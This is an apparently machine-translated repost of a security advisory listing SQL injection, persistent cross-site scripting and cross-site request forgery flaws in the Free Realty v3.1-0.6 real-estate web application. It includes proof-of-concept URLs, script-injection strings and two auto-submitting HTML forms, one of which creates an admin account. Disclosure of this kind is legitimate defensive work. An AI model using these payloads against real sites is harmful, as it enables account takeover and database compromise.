Free Realty v3.1-more than 0.6 defects and repair

Source: Internet
Author: User

Title: Free Reality v3.1-0.6-Multiple Web Vulnerabilities
Introduction:
==================
Free Realty is primarily designed for real estate agents and offices to list properties on the internet. With Free Realty the end
User does not need to be fluent in web page design. Read more in the demo site
This is a fork
Software written by Jon Roig called Open Realty. Jon has moved on to version 3.0 while a number of users have requested
Continued development on the 2.x series. Other sites of note regarding 2.x development
Www.1axn.com/gi-bin/openforum/ikonboard.cgi the original discussion board, before Jon opened up his own.
 
Affected Versions:
==========
A Vulnerability Laboratory Researcher Team discovered multiple Web Vulnerabilities in the Free Reality v3.1-0.6 web application.
 
Problem type: Remote
 
 
Technical analysis:
==========
1.1
A remote SQL Injection vulnerability is detected in the Free Reality v3.1-0.6 web application.
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own SQL commands on
The affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise.
 
Vulnerable Module (s ):
[+] Agentdisplay. php? View =
[+]/Admin. php? Edit =
 
1.2
Multiple persistent input validation vulnerabilities are detected in the Free Reality v3.1-0.6 web application.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent ).
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation.
Exploitation requires low user inter action.

Vulnerable Module (s ):
[+] Admin/agenteditor. php-inject notes about the Agent
[+] Agentadmin. php? Edit = 2-inject title/preview description:/Long description:/notes
[+] Agentadmin. php? Action = addlisting inject title/preview description:/Long description:/notes
[+] Admin/adminfeatures. php-Add new feature
 
 
1.3
A cross site request forgery vulnerability is detected in the Free Reality v3.1-0.6 web application. The bugs allow remote
Attackers with high required user inter action to edit user accounts. Successful exploitation can lead to account access.
To exploit the issue the attacker need to create a manipulated copy the edit user mask/form. Inside of the document
Remote can implement his own values for the update because of no form or token protection. When admin get now forced
Execute the script via link he is executing the new value on the update of the application if his session is not expired.
 
Vulnerable Module (s ):
[+] Admin/agenteditor. php? Action = addagent-Add agent
[+] Admin/agenteditor. php? Adminmodify = 2-Modify Agent
 
 
Test proof:
========================
1.1
The SQL injection vulnerability can be exploited by remote attackers without user inter action. For demonstration or reproduce...
 
PoC:
Http://www.2cto.com/FR/agentdisplay. php? View = 1 [SQL-INJECTION!]
Http: // 127.0.0.1/FR/admin. php? Edit = 2 [SQL-INJECTION!]
 
1.2
The persistent input validation vulnerability can be exploited by remote attackers with medium till low required user inter action.
For demonstration or reproduce...
 
Note:
The issue can be exploited by an insert on the Created Object function with script code as value.
The result is the persistent execution out of the web application context.
 
Strings:
> "<Iframe src = http: // www.2cto.com/> 37 </iframe>... or
> "<Script> alert (document. cookie) </script> <div style =" 1
 
1.3
The csrf vulnerability can be exploited by remote attackers with high required user inter action. For demonstration or reproduce...
 
<Html>
<Form name = "test" action = "http: // 127.0.0.1/FR/admin/agenteditor. php? Adminmodify = 2 "method =" post ">
<Input type = "hidden" name = "agent" value = "test2"> <br/>
<Input type = "hidden" name = "agenttitle" value = "test3"> <br/>
<Input type = "hidden" name = "agentpass" value = "storm"> <br/>
</Form>
<Script> document. test. submit (); </script>
</Html>
 
<Html>
<Form name = "addagent" action = "http: // 127.0.1.1/FR/admin/agenteditor. php? Action = addagent "method =" post ">
<Input type = "hidden" name = "agent" value = "test3"> <br/>
<Input type = "hidden" name = "agenttitle" value = "test3"> <br/>
<Input type = "hidden" name = "agentpass" value = "test3"> <br/>
<Input type = "hidden" name = "agentfax" value = "test3"> <br/>
<Input type = "hidden" name = "agentcell" value = "test3"> <br/>
<Input type = "hidden" name = "agentphone" value = "test3"> <br/>
<Input type = "hidden" name = "agenturl" value = "test3"> <br/>
<Input type = "hidden" name = "agentemail =" value = "test3@hotmail.com"> <br/>
<Input type = "hidden" name = "user_level" value = "admin"> <br/>
<Input type = "hidden" name = "notes" value = "TEST #"> <br/>
</Form>
<Script> document. addagent. submit (); </script>
</Html>
 
 
Risk:
=====
1.1
The security risk of the remote SQL injection vulnerability is estimated as critical.
 
1.2
The security risk of the persistent input validation vulnerability is estimated as medium.
 
1.3
The security risk of the cross site request forgery vulnerability is estimated as low (+ ).
 
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.